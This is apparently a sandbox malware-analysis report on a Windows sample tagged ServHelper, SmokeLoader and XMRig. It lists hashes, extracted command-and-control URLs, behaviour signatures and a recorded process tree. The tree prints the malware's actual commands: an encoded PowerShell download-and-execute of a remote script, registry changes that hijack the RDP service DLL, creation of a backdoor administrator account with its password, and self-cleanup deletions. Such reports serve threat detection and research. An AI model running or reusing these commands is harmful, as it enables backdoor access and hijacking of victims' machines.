Overview

overview

10

Static

static

dridex

windows10_x64

10

Analysis

  • max time kernel
    151s
  • max time network
    135s
  • submitted
    01-01-1970 00:00

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    df2cda7268742a64ff9f639ea838b375b3a0d12bcf01afec13bccafb8abdefe1.exe

  • Size

    340KB

  • MD5

    a3462aada89ad7cc91f3850fbd41bd21

  • SHA1

    21029d650dd17a48c81c76f72d7c1c47dae9de46

  • SHA256

    df2cda7268742a64ff9f639ea838b375b3a0d12bcf01afec13bccafb8abdefe1

  • SHA512

    23177bd4fe2ad3a784371236cefd3775e17a008579db04226a9e6a5d68b3850d1d930fc7a5d7ba5e7a47b006c950a17e114b6c76ef524eecaf62926fac6982f8

Score
10/10
servhelpersmokeloaderxmrigbackdoorminerpersistencespywaretrojanupx

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Extracted

Family

smokeloader

Version

2020

C2

http://brandyjaggers.com/upload/

http://andbal.com/upload/

http://alotofquotes.com/upload/

http://szpnc.cn/upload/

http://uggeboots.com/upload/

http://100klv.com/upload/

http://rapmusic.at/upload/
rc4.i32
rc4.i32

Signatures

  • ServHelper

    ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.

    trojanbackdoorservhelper
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 9 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 5 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Sets DLL path for service in the registry 2 TTPs
    persistence
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Deletes itself 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Drops file in System32 directory 1 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 24 IoCs
  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Runs net.exe
  • Script User-Agent 4 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 3 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SendNotifyMessage 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\df2cda7268742a64ff9f639ea838b375b3a0d12bcf01afec13bccafb8abdefe1.exe
    "C:\Users\Admin\AppData\Local\Temp\df2cda7268742a64ff9f639ea838b375b3a0d12bcf01afec13bccafb8abdefe1.exe"
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    PID:3048
  • C:\Users\Admin\AppData\Local\Temp\5408.exe
    C:\Users\Admin\AppData\Local\Temp\5408.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:3676
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
      2⤵
      • Drops file in Windows directory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:436
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5ldxzg32\5ldxzg32.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3700
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6B49.tmp" "c:\Users\Admin\AppData\Local\Temp\5ldxzg32\CSCC20C9920362242BEB38A665CAD5328AE.TMP"
          4⤵
            PID:2400
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2808
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1832
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
            PID:2100
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
            3⤵
              PID:3572
            • C:\Windows\system32\reg.exe
              "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
              3⤵
              • Modifies registry key
              PID:396
            • C:\Windows\system32\reg.exe
              "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
              3⤵
                PID:2196
              • C:\Windows\system32\net.exe
                "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:2456
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                  4⤵
                    PID:2276
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                  3⤵
                    PID:1708
                    • C:\Windows\system32\cmd.exe
                      cmd /c net start rdpdr
                      4⤵
                        PID:1212
                        • C:\Windows\system32\net.exe
                          net start rdpdr
                          5⤵
                          • Suspicious use of WriteProcessMemory
                          PID:3360
                          • C:\Windows\system32\net1.exe
                            C:\Windows\system32\net1 start rdpdr
                            6⤵
                              PID:2412
                      • C:\Windows\system32\cmd.exe
                        "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                        3⤵
                        • Suspicious use of WriteProcessMemory
                        PID:3112
                        • C:\Windows\system32\cmd.exe
                          cmd /c net start TermService
                          4⤵
                          • Suspicious use of WriteProcessMemory
                          PID:592
                          • C:\Windows\system32\net.exe
                            net start TermService
                            5⤵
                            • Suspicious use of WriteProcessMemory
                            PID:3496
                            • C:\Windows\system32\net1.exe
                              C:\Windows\system32\net1 start TermService
                              6⤵
                                PID:3060
                        • C:\Windows\system32\cmd.exe
                          "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                          3⤵
                            PID:1516
                          • C:\Windows\system32\cmd.exe
                            "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                            3⤵
                              PID:3532
                        • C:\Users\Admin\AppData\Local\Temp\5DFB.exe
                          C:\Users\Admin\AppData\Local\Temp\5DFB.exe
                          1⤵
                          • Executes dropped EXE
                          • Suspicious use of WriteProcessMemory
                          PID:1104
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
                            2⤵
                            • Drops file in System32 directory
                            • Drops file in Windows directory
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:972
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ah3pstte\ah3pstte.cmdline"
                              3⤵
                              • Suspicious use of WriteProcessMemory
                              PID:3660
                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8DF4.tmp" "c:\Users\Admin\AppData\Local\Temp\ah3pstte\CSCF668987D61DD46C1BC90A44B116B8D7C.TMP"
                                4⤵
                                  PID:904
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                3⤵
                                  PID:980
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                  3⤵
                                    PID:3408
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                    3⤵
                                      PID:1980
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
                                      3⤵
                                        PID:3704
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
                                        3⤵
                                        • Modifies registry key
                                        PID:296
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
                                        3⤵
                                          PID:3220
                                        • C:\Windows\SysWOW64\net.exe
                                          "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                                          3⤵
                                            PID:2640
                                            • C:\Windows\SysWOW64\net1.exe
                                              C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                                              4⤵
                                                PID:3052
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                                              3⤵
                                                PID:3648
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /c net start rdpdr
                                                  4⤵
                                                    PID:3760
                                                    • C:\Windows\SysWOW64\net.exe
                                                      net start rdpdr
                                                      5⤵
                                                        PID:1400
                                                        • C:\Windows\SysWOW64\net1.exe
                                                          C:\Windows\system32\net1 start rdpdr
                                                          6⤵
                                                            PID:4044
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                                                      3⤵
                                                        PID:1552
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          cmd /c net start TermService
                                                          4⤵
                                                            PID:3680
                                                            • C:\Windows\SysWOW64\net.exe
                                                              net start TermService
                                                              5⤵
                                                                PID:1504
                                                                • C:\Windows\SysWOW64\net1.exe
                                                                  C:\Windows\system32\net1 start TermService
                                                                  6⤵
                                                                    PID:4060
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                                                              3⤵
                                                                PID:2668
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                                                                3⤵
                                                                  PID:2132
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1104 -s 1408
                                                                2⤵
                                                                • Program crash
                                                                PID:1556
                                                            • C:\Users\Admin\AppData\Local\Temp\828C.exe
                                                              C:\Users\Admin\AppData\Local\Temp\828C.exe
                                                              1⤵
                                                              • Executes dropped EXE
                                                              PID:4088
                                                            • C:\Users\Admin\AppData\Local\Temp\8905.exe
                                                              C:\Users\Admin\AppData\Local\Temp\8905.exe
                                                              1⤵
                                                              • Executes dropped EXE
                                                              PID:3840
                                                            • C:\Windows\System32\cmd.exe
                                                              cmd /C net.exe user WgaUtilAcc 000000 /del
                                                              1⤵
                                                              • Suspicious use of WriteProcessMemory
                                                              PID:3772
                                                              • C:\Windows\system32\net.exe
                                                                net.exe user WgaUtilAcc 000000 /del
                                                                2⤵
                                                                • Suspicious use of WriteProcessMemory
                                                                PID:3512
                                                                • C:\Windows\system32\net1.exe
                                                                  C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
                                                                  3⤵
                                                                    PID:2276
                                                              • C:\Windows\System32\cmd.exe
                                                                cmd /C net.exe user WgaUtilAcc olU7i6px /add
                                                                1⤵
                                                                  PID:2904
                                                                  • C:\Windows\system32\net.exe
                                                                    net.exe user WgaUtilAcc olU7i6px /add
                                                                    2⤵
                                                                      PID:2016
                                                                      • C:\Windows\system32\net1.exe
                                                                        C:\Windows\system32\net1 user WgaUtilAcc olU7i6px /add
                                                                        3⤵
                                                                          PID:1288
                                                                    • C:\Windows\System32\cmd.exe
                                                                      cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                                                                      1⤵
                                                                        PID:1552
                                                                        • C:\Windows\system32\net.exe
                                                                          net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                                                                          2⤵
                                                                            PID:1584
                                                                            • C:\Windows\system32\net1.exe
                                                                              C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                                                                              3⤵
                                                                              • Suspicious use of WriteProcessMemory
                                                                              PID:1212
                                                                        • C:\Windows\System32\cmd.exe
                                                                          cmd /C net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
                                                                          1⤵
                                                                            PID:2292
                                                                            • C:\Windows\system32\net.exe
                                                                              net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
                                                                              2⤵
                                                                                PID:1764
                                                                                • C:\Windows\system32\net1.exe
                                                                                  C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
                                                                                  3⤵
                                                                                    PID:1448
                                                                              • C:\Windows\System32\cmd.exe
                                                                                cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                                                                1⤵
                                                                                  PID:3860
                                                                                  • C:\Windows\system32\net.exe
                                                                                    net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                                                                    2⤵
                                                                                      PID:3704
                                                                                      • C:\Windows\system32\net1.exe
                                                                                        C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                                                                        3⤵
                                                                                          PID:2136
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      cmd /C net.exe user WgaUtilAcc olU7i6px
                                                                                      1⤵
                                                                                        PID:3244
                                                                                        • C:\Windows\system32\net.exe
                                                                                          net.exe user WgaUtilAcc olU7i6px
                                                                                          2⤵
                                                                                            PID:2196
                                                                                            • C:\Windows\system32\net1.exe
                                                                                              C:\Windows\system32\net1 user WgaUtilAcc olU7i6px
                                                                                              3⤵
                                                                                                PID:2904
                                                                                          • C:\Windows\System32\cmd.exe
                                                                                            cmd.exe /C wmic path win32_VideoController get name
                                                                                            1⤵
                                                                                              PID:2152
                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                wmic path win32_VideoController get name
                                                                                                2⤵
                                                                                                  PID:600
                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                cmd.exe /C wmic CPU get NAME
                                                                                                1⤵
                                                                                                  PID:1764
                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    2⤵
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:1708
                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                    wmic CPU get NAME
                                                                                                    2⤵
                                                                                                      PID:3000
                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                    cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                                                    1⤵
                                                                                                      PID:3064
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                                                        2⤵
                                                                                                          PID:1876
                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                                                            3⤵
                                                                                                            • Blocklisted process makes network request
                                                                                                            • Drops file in Program Files directory
                                                                                                            • Drops file in Windows directory
                                                                                                            • Modifies data under HKEY_USERS
                                                                                                            PID:2472
                                                                                                      • C:\Users\Admin\AppData\Roaming\atsfrcr
                                                                                                        C:\Users\Admin\AppData\Roaming\atsfrcr
                                                                                                        1⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Checks SCSI registry key(s)
                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                        PID:2020

                                                                                                      Network

                                                                                                      MITRE ATT&CK Enterprise v6

                                                                                                      Replay Monitor

                                                                                                      Loading Replay Monitor...

                                                                                                      Downloads

                                                                                                      • memory/436-176-0x0000015E7A410000-0x0000015E7A411000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                        Download

                                                                                                      • memory/436-144-0x0000015E79480000-0x0000015E79482000-memory.dmp

                                                                                                        Filesize

                                                                                                        8KB

                                                                                                        Download

                                                                                                      • memory/436-141-0x0000015E79AB0000-0x0000015E79AB1000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                        Download

                                                                                                      • memory/436-158-0x0000015E79826000-0x0000015E79828000-memory.dmp

                                                                                                        Filesize

                                                                                                        8KB

                                                                                                        Download

                                                                                                      • memory/436-140-0x0000015E79480000-0x0000015E79482000-memory.dmp

                                                                                                        Filesize

                                                                                                        8KB

                                                                                                        Download

                                                                                                      • memory/436-139-0x0000015E79480000-0x0000015E79482000-memory.dmp

                                                                                                        Filesize

                                                                                                        8KB

                                                                                                        Download

                                                                                                      • memory/436-153-0x0000015E79820000-0x0000015E79822000-memory.dmp

                                                                                                        Filesize

                                                                                                        8KB

                                                                                                        Download

                                                                                                      • memory/436-138-0x0000015E79790000-0x0000015E79791000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                        Download

                                                                                                      • memory/436-137-0x0000015E79480000-0x0000015E79482000-memory.dmp

                                                                                                        Filesize

                                                                                                        8KB

                                                                                                        Download

                                                                                                      • memory/436-136-0x0000015E79480000-0x0000015E79482000-memory.dmp

                                                                                                        Filesize

                                                                                                        8KB

                                                                                                        Download

                                                                                                      • memory/436-135-0x0000015E79480000-0x0000015E79482000-memory.dmp

                                                                                                        Filesize

                                                                                                        8KB

                                                                                                        Download

                                                                                                      • memory/436-166-0x0000015E797D0000-0x0000015E797D1000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                        Download

                                                                                                      • memory/436-134-0x0000015E79480000-0x0000015E79482000-memory.dmp

                                                                                                        Filesize

                                                                                                        8KB

                                                                                                        Download

                                                                                                      • memory/436-154-0x0000015E79823000-0x0000015E79825000-memory.dmp

                                                                                                        Filesize

                                                                                                        8KB

                                                                                                        Download

                                                                                                      • memory/436-170-0x0000015E79828000-0x0000015E79829000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                        Download

                                                                                                      • memory/436-175-0x0000015E7A080000-0x0000015E7A081000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                        Download

                                                                                                      • memory/972-199-0x0000000006CB0000-0x0000000006CB1000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                        Download

                                                                                                      • memory/972-196-0x00000000072F0000-0x00000000072F1000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                        Download

                                                                                                      • memory/972-1555-0x000000007E6B0000-0x000000007E6B1000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                        Download

                                                                                                      • memory/972-212-0x0000000002E60000-0x0000000002E61000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                        Download

                                                                                                      • memory/972-206-0x00000000083F0000-0x00000000083F1000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                        Download

                                                                                                      • memory/972-193-0x0000000002E60000-0x0000000002E61000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                        Download

                                                                                                      • memory/972-194-0x0000000002E60000-0x0000000002E61000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                        Download

                                                                                                      • memory/972-195-0x0000000004AB0000-0x0000000004AB1000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                        Download

                                                                                                      • memory/972-205-0x0000000007F80000-0x0000000007F81000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                        Download

                                                                                                      • memory/972-204-0x0000000007B70000-0x0000000007B71000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                        Download

                                                                                                      • memory/972-210-0x0000000008210000-0x0000000008211000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                        Download

                                                                                                      • memory/972-282-0x0000000006CB3000-0x0000000006CB4000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                        Download

                                                                                                      • memory/972-200-0x0000000006CB2000-0x0000000006CB3000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                        Download

                                                                                                      • memory/972-201-0x00000000070D0000-0x00000000070D1000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                        Download

                                                                                                      • memory/972-202-0x0000000007270000-0x0000000007271000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                        Download

                                                                                                      • memory/980-444-0x000000007F000000-0x000000007F001000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                        Download

                                                                                                      • memory/980-360-0x0000000004642000-0x0000000004643000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                        Download

                                                                                                      • memory/980-359-0x0000000004640000-0x0000000004641000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                        Download

                                                                                                      • memory/1104-149-0x00000000084E0000-0x00000000084E1000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                        Download

                                                                                                      • memory/1104-155-0x0000000007CC0000-0x0000000007CC1000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                        Download

                                                                                                      • memory/1104-142-0x00000000080E0000-0x00000000084DF000-memory.dmp

                                                                                                        Filesize

                                                                                                        4.0MB

                                                                                                        Download

                                                                                                      • memory/1104-150-0x00000000089E0000-0x00000000089E1000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                        Download

                                                                                                      • memory/1104-131-0x0000000004C18000-0x000000000501E000-memory.dmp

                                                                                                        Filesize

                                                                                                        4.0MB

                                                                                                        Download

                                                                                                      • memory/1104-169-0x0000000007CC4000-0x0000000007CC5000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                        Download

                                                                                                      • memory/1104-152-0x0000000000400000-0x0000000002FA5000-memory.dmp

                                                                                                        Filesize

                                                                                                        43.6MB

                                                                                                        Download

                                                                                                      • memory/1104-168-0x000000000A3C0000-0x000000000A3C1000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                        Download

                                                                                                      • memory/1104-132-0x0000000005020000-0x0000000005422000-memory.dmp

                                                                                                        Filesize

                                                                                                        4.0MB

                                                                                                        Download

                                                                                                      • memory/1104-156-0x0000000007CC2000-0x0000000007CC3000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                        Download

                                                                                                      • memory/1104-157-0x0000000007CC3000-0x0000000007CC4000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                        Download

                                                                                                      • memory/1104-161-0x0000000008BE0000-0x0000000008BE1000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                        Download

                                                                                                      • memory/1832-320-0x0000024119BB6000-0x0000024119BB8000-memory.dmp

                                                                                                        Filesize

                                                                                                        8KB

                                                                                                        Download

                                                                                                      • memory/1832-284-0x0000024119BB0000-0x0000024119BB2000-memory.dmp

                                                                                                        Filesize

                                                                                                        8KB

                                                                                                        Download

                                                                                                      • memory/1832-285-0x0000024119BB3000-0x0000024119BB5000-memory.dmp

                                                                                                        Filesize

                                                                                                        8KB

                                                                                                        Download

                                                                                                      • memory/1980-1059-0x00000000073B0000-0x00000000073B1000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                        Download

                                                                                                      • memory/1980-1087-0x000000007F3E0000-0x000000007F3E1000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                        Download

                                                                                                      • memory/1980-1060-0x00000000073B2000-0x00000000073B3000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                        Download

                                                                                                      • memory/2020-1442-0x0000000002BB0000-0x0000000002CFA000-memory.dmp

                                                                                                        Filesize

                                                                                                        1.3MB

                                                                                                        Download

                                                                                                      • memory/2020-1443-0x0000000000400000-0x0000000002BAF000-memory.dmp

                                                                                                        Filesize

                                                                                                        39.7MB

                                                                                                        Download

                                                                                                      • memory/2100-362-0x000001E3A30F3000-0x000001E3A30F5000-memory.dmp

                                                                                                        Filesize

                                                                                                        8KB

                                                                                                        Download

                                                                                                      • memory/2100-391-0x000001E3A30F6000-0x000001E3A30F8000-memory.dmp

                                                                                                        Filesize

                                                                                                        8KB

                                                                                                        Download

                                                                                                      • memory/2100-394-0x000001E3A30F8000-0x000001E3A30FA000-memory.dmp

                                                                                                        Filesize

                                                                                                        8KB

                                                                                                        Download

                                                                                                      • memory/2100-361-0x000001E3A30F0000-0x000001E3A30F2000-memory.dmp

                                                                                                        Filesize

                                                                                                        8KB

                                                                                                        Download

                                                                                                      • memory/2472-755-0x000001FC027C0000-0x000001FC027C2000-memory.dmp

                                                                                                        Filesize

                                                                                                        8KB

                                                                                                        Download

                                                                                                      • memory/2472-756-0x000001FC027C3000-0x000001FC027C5000-memory.dmp

                                                                                                        Filesize

                                                                                                        8KB

                                                                                                        Download

                                                                                                      • memory/2472-817-0x000001FC027C6000-0x000001FC027C8000-memory.dmp

                                                                                                        Filesize

                                                                                                        8KB

                                                                                                        Download

                                                                                                      • memory/2472-948-0x000001FC027C8000-0x000001FC027C9000-memory.dmp

                                                                                                        Filesize

                                                                                                        4KB

                                                                                                        Download

                                                                                                      • memory/2808-198-0x000002162B7F3000-0x000002162B7F5000-memory.dmp

                                                                                                        Filesize

                                                                                                        8KB

                                                                                                        Download

                                                                                                      • memory/2808-184-0x00000216118E0000-0x00000216118E2000-memory.dmp

                                                                                                        Filesize

                                                                                                        8KB

                                                                                                        Download

                                                                                                      • memory/2808-185-0x00000216118E0000-0x00000216118E2000-memory.dmp

                                                                                                        Filesize

                                                                                                        8KB

                                                                                                        Download

                                                                                                      • memory/2808-186-0x00000216118E0000-0x00000216118E2000-memory.dmp

                                                                                                        Filesize

                                                                                                        8KB

                                                                                                        Download

